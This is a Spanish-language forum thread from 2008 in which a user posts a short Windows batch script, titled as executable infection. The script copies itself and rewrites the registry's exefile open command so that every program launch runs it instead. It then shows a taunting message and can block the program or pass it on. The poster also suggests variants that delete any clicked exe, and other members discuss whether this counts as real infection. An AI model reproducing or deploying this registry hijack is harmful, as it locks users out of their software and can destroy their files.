Posible Infeccion de EXE...

Iniciado por SmartGenius, 5 Mayo 2008, 03:21 AM

0 Miembros y 1 Visitante están viendo este tema.

SmartGenius

miren... yo el code que tengo es mas o menos el siguiente

  @echo off
title Infeccion de Ejecutables

if exist "%windir%\system32\exer.bat" (goto yes) else (goto main)

:main
copy %0
reg add HKCR\exefile\shell\open\command /ve /t REG_SZ /d exer.bat %%1 %%* /f
exit

:yes
msg /w * Te tengo ;)
call %1 (opcional)
exit


aunque tambien se puede poner solo un nombre de archivo... que muestre un mensaje de error y se salga... asi le provocara que se salga de sus cabales  :P :P, yo mismo me infecte y casi que me tiro d euna ventana  ;D

el codigo es asi como lo postee, el objetivo mio es que cuando el usuario intente abrir un programa le salga un mensaje ( al azar, o predefinido "powered by...") y que se salga
esto podria ser usado con varios fines, que le muestre el error y se salga, o que le muestre otro mensaje y posteriormente abra el programa, o que borre cualquier exe que sea clicado  >:D >:D

solo es una idea, si esta mal... por favor me corrigen

Saludos.


MK-Ultra

Perdona mi ignorancia, pero aver si entendí el code:


@echo off
title Infeccion de Ejecutables

if exist "%windir%\system32\exer.bat" (goto yes) else (goto main)

Hasta aca todo bien

:main
copy %0
reg add HKCR\exefile\shell\open\command /ve /t REG_SZ /d exer.bat %%1 %%* /f
exit

Esto lo que hace es copiar el bat (exer.bat) en la carpeta system32 (copy %0) y la linea del registro sirve para que cada vez que se ejecute un programa se ejecute previamente el bat?

:yes
msg /w * Te tengo ;)
call %1 (opcional)
exit


Bueno, esto saca un mensaje que dice te tengo y posteriormente habre el bat de vuelta, nada nuevo :)
Agradecer no cuesta nada (al menos no mucho)

BTC: 1DHKsWE6wGkUiHbKkwBDaF8DEGwn9n6nxQ

Chino Moreno

Deberias cambiar el titulo, esto no tiene nada que ver con infectar un ejecutable.


¿Necesitas información sobre una función que comenté? Lo mas seguro es que la encuentres en MSDN

SmartGenius

Cita de: ^Arkangel^ en  5 Mayo 2008, 20:22 PM
Bueno, esto saca un mensaje que dice te tengo y posteriormente habre el bat de vuelta, nada nuevo :)

Pues si lo entendiste, pero no llama nuevamente al bat, sino que llama al ejecutable...

osea, este se agrega al registro, y cuando intenten abrir un programa se abrira es nnuestro code, entonces sale el mensaje, y la opcinal es que despues abar el programa al que se quiso llamar, osea el que se pasa al code con el parametro %1, si no ponemos esto, entonces simplemente no deja abrir ningun ejecutable...

Entiendes ??

Saludos.


MK-Ultra

Agradecer no cuesta nada (al menos no mucho)

BTC: 1DHKsWE6wGkUiHbKkwBDaF8DEGwn9n6nxQ

NoryNR

Cita de: Chino Moreno en  5 Mayo 2008, 20:36 PM
Deberias cambiar el titulo, esto no tiene nada que ver con infectar un ejecutable.

estoy con el :P

SmartGenius

Pues i se habran dado cuenta dice"Posible"... no que realmente lo sea, pero se encarga de deshabilitar ejecutables, como si estuviesen infectado...

mas o menos esa era la idea.

Saludos.